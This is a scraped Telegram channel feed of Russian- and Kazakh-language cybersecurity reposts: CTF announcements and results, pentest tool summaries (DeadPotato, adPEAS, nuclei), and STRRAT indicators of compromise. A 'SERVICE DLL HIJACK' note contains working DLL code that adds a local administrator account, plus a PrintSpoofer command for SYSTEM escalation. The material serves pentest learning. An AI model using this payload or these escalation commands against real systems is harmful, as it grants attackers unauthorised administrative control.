g00f1x stories


Гео и язык канала: не указан, не указан
Категория: не указана


делюсь опытом

Связанные каналы

Гео и язык канала
не указан, не указан
Категория
не указана
Статистика
Фильтр публикаций


Репост из: Инфобез
Готовы к новым вызовам? 📢
Cyber Challenge STS ждет тебя!

Соревнование Cyber Challenge STS — это уникальная возможность для студентов бакалавра и магистратуры погрузиться в мир кибербезопасности, продемонстрировать свои навыки и заявить о себе на цифровой арене. Участники будут решать задачи, основанные на реальных кейсах, соревнуясь за право называться лучшими.

🗓Регистрация продлится до 14 ноября.
🎁Призы для победителей будут объявлены позже, поэтому следите за обновлениями!

📌Подробнее и регистрация на сайте: challenge.sts.kz.


Cyberqupiya.kz – это новая платформа для тренировки навыков кибербезопасности, специально разработанная для казахстанской аудитории. Платформа предлагает широкий спектр задач и симуляций, которые охватывают ключевые аспекты киберзащиты: от базового тестирования на проникновение до сложных задач в криптографии и защите сетей.

Пользователи могут решать задачи разной сложности, участвовать в челленджах в формате CTF (Capture the Flag), а также получать рейтинги и значки за свои достижения. Платформа создана, чтобы обучать и развивать навыки будущих специалистов по информационной безопасности в Казахстане, а также повысить общую осведомленность о киберугрозах. Cyberqupiya.kz призвана стать местом, где сообщество энтузиастов и профессионалов может делиться опытом, соревноваться и совершенствовать свои навыки киберзащиты.
Cyberqupiya.kz – бұл Қазақстан аудиториясына арналған киберқауіпсіздік дағдыларын дамытуға арналған жаңа платформа. Платформа киберқорғаудың негізгі аспектілерін қамтитын түрлі тапсырмалар мен симуляцияларды ұсынады: базалық пентестингтен бастап, күрделі криптография мен желілік қауіпсіздікке дейін.

Қолданушылар әртүрлі күрделілік деңгейіндегі тапсырмаларды орындай алады, CTF (Capture the Flag) форматындағы челендждерге қатыса алады, сондай-ақ, жетістіктеріне байланысты рейтингтер мен белгілерге ие болады. Платформаның мақсаты – Қазақстандағы болашақ ақпараттық қауіпсіздік мамандарын оқыту және дамыту, сондай-ақ, киберқауіп-қатерлер туралы жалпы ақпараттандыруды арттыру. Cyberqupiya.kz платформасы – бұл тәжірибе алмасып, жарысып және киберқорғау дағдыларын жетілдіру үшін энтузиастар мен мамандар қауымдастығына арналған орта болуды мақсат етеді.

832 1 58 15 35

Итоги КХС

250 0 6 21 18



Репост из: haxx
Видео недоступно для предпросмотра
Смотреть в Telegram
Всем привет. Выпустил в паблик Sploitify (https://sploitify.haxx.it) - агрегатор эксплойтов/поков/райтапов с тегами по уязвимостям. Что-то вроде GTFOBins, но для эксплойтов. Сейчас в нем можно найти чекеры от nuclei (тысячи их), некоторые эксплойты на эскалацию привилегий и удаленное выполнение кода в винде и никсах. Еще много чего добавлять, но пользоваться уже можно. Надеюсь пригодится и сделает вашу жизнь немножко легче, по крайней мере такая была цель :)


Репост из: TSARKA (official channel)
🏆 Участники казахстанской команды FR13NDS TEAM выиграли и заняли призовые места в HITB Single Player CTF 2024

🌴 29 - 30 августа 2024 года проходило международное соревнование HITB Single Player CTF с индивидуальным участием в рамках конференции HITBSecConf 2024 в г. Бангкок, Таиланд. 🇹🇭

💻 В соревновании участвовали более 60 человек. Задачи были по 5 категориям, такие как веб, форензика, реверс-инжиниринг, бинарная эксплуатация, криптография.

По итогам соревнования определились победители:
🥇1 место - Bekzhan Darmenov 🇰🇿 😏
🥈2 место - Puttimet Thammasaeng 🇹🇭 (1500 USD)
🥉3 место - Sailauov Didar 🇰🇿 😏

Поздравляем новое поколение cybersecurity специалистов с очередной победой на международной арене.


Репост из: KazHackStan
Отбор команд для участия в CyberKumbez завершен!

24 команды поборятся за звание лучшей RedTeam-команды на KazHackStan 2024 🔥

- MG.RT
- Scr1ptK1tty
- KTG
- S.H.I.E.L.D
- Space
- Turna Cyber Team
- 1729
- c1cada
- ChiLL Chain
- DD0st4r
- em1x
- FR13NDS TEAM
- fsociety
- glitch_slayers
- Loading
- M1GU3L
- mimicats
- PatchProwlers
- scimus_verum
- Syst3m of a pwn
- Team1337
- WP
- Abyroy Cyber Team
- ?_?

Поздравляем!💥


Репост из: APT
Видео недоступно для предпросмотра
Смотреть в Telegram
🥔 DeadPotato

This is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.

🔗 Source:
https://github.com/lypd0/DeadPotato

#windows #lpe #potato #seimpersonate


Репост из: Pentest HaT 🎩
🏃 adPEAS 0.8.24

Отличный инструмент для проведения enumeration в 🏠 Active Directory

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

adPEAS-Light отличается отсутствием модуля для BH, соответственно меньше вероятность детектирования антивирусом

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS

Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH


Вари
анты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'

Оп
ределенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cre
d = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

I
nvoke-adPEAS -Domain 'contoso.com' -Cred $Cred

Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke
-adPEAS -Module Accounts

I
nvoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All

💻 Home

#soft #powershell #activedirectory #enumeration

✈️ // Pentest HaT 🎩




Интересная статья от Bi.Zone: "Bloody Wolf применяет коммерческое ВПО STRRAT против организаций в Казахстане"
https://bi.zone/expertise/blog/bloody-wolf-primenyaet-kommercheskoe-vpo-strrat-protiv-organizatsiy-v-kazakhstane/
Indicators of Compromise (IOCs):


00172976ee3057dd6555734af28759add7daea55047eb6f627e5491701c3ec83
cb55cf3e486f3cbe3756b9b3abf1673099384a64127c99d9065aa26433281167
a6fb286732466178768b494103e59a9e143d77d49445a876ebd3a40904e2f0b0
25c622e702b68fd561db1aec392ac01742e757724dd5276b348c11b6c5e23e59
14ec3d03602467f8ad2e26eef7ce950f67826d23fedb16f30d5cf9c99dfeb058
ee113a592431014f44547b144934a470a1f7ab4abec70ba1052a4feb3d15d5c6
Ссылки на Pastebin:



https://pastebin[.]com/raw/dFKy3ZDm:13570
https://pastebin[.]com/raw/dLzt4tRB:13569
https://pastebin[.]com/raw/dLzt4tRB:10101
https://pastebin[.]com/raw/YZLySxsv:20202
https://pastebin[.]com/raw/8umPhg86:13772
https://pastebin[.]com/raw/67b8GSUQ:13671
https://pastebin[.]com/raw/8umPhg86:13771
https://pastebin[.]com/raw/67b8GSUQ:13672
https://pastebin[.]com/raw/dLzt4tRB:13880
https://pastebin[.]com/raw/YZLySxsv:13881
IP-адреса:


91.92.240[.]188
185.196.10[.]116
Хозяин репозитория: davutovdavran

При исследовании ссылок на Pastebin, можно найти ещё интересные репозитории:

https://pastebin.com/X2m93KYB
https://pastebin.com/DsDD0jb9




Репост из: RedTeam brazzers
Видео недоступно для предпросмотра
Смотреть в Telegram


SERVICE DLL HIJACK Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}


icacls .\Documents\vuln.exe



$env:path
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

#include
#include

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user g00f1x password123! /add");
i = system ("net localgroup administrators dave2 /add");
i = system ("net localgroup \"Remote Desktop Users\" \"dave2\" /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}


SeImpersonatePrivilege Other privileges that may lead to privilege escalation are **SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug.** In this section, we'll closely inspect privilege escalation vectors in the context of SeImpersonatePrivilege.


whoami /priv


Privilege Name Description State
============================= ========================================= ========
SeSecurityPrivilege Manage auditing and security log Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
**SeImpersonatePrivilege Impersonate a client after authentication Enabled **

SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled


.\PrintSpoofer64.exe -i -c powershell.exe

-cmd "cmd /c whoami"


Репост из: k8s (in)security
Если вы занимаетесь пентестами, то наверняка слышали о такой утилите как nuclei. Эта тулза является очень гибким и легко кастомизируемым vulnerability сканером, благодаря templates, которые пишутся на YAML.

Так вот ребята из ProjectDiscovery (авторы тулзы) решили пойти дальше и добавить темплейты для сканирования Kubernetes кластера:

- Deployment Configurations Review
- Network Policies Enforcement
- Pod Security Standards
- Compliance and Configuration Management
- Security Contexts and Roles
- Logging and Monitoring
- Secrets Management
- Vulnerability Scanning and Patch Management

Всё это доступно в темплейтах версии 9.9.0. Естественно их можно кастомизировать – писать кастомные проверки, compliance и прочее.




Репост из: Proxy Bar
MSSQL ATTACK TOOL - pentesting MSSQL servers
*
writeUP
*
download

#tools #mssql


Репост из: Proxy Bar
1 миллион дорков
*
download


99

Показано 20 последних публикаций.